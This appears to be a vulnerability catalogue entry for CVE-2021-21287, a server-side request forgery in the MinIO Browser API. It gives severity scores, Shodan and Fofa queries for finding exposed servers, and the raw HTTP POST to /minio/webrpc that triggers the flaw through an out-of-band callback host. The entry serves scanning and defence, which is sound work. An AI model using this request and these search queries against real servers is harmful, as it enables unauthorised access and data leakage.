| Title | MinIO Browser API - Server-Side Request Forgery |
|---|---|
| Author | pikpikcu |
| Severity | High |
| Impact | Successful exploitation of this vulnerability could allow an attacker to make arbitrary requests on behalf of the server, potentially leading to unauthorized access or data leakage. |
| Remediation | Apply the latest security patches or updates provided by MinIO to fix this vulnerability. |
| CVSS Score | 7.7 |
| EPSS Score | 0.91999 |
| CVE ID | CVE-2021-21287 |
| CWE ID | CWE-918 |
| Shodan Query | http.title:"minio browser"cpe:"cpe:2.3:a:minio:minio"http.title:"minio console" |
| Fofa Query | title="minio console"app="minio"title="minio browser" |
| Tags | cve cve2021 minio ssrf oast vuln |
MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
POST /minio/webrpc HTTP/1.1
Host: d5jn581le0o2cs0h6v40iyqtybqrjmdjq.oast.me
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 76
Content-Type: application/json
Accept-Encoding: gzip
{"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21287.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-21287.pcap
N/AN/A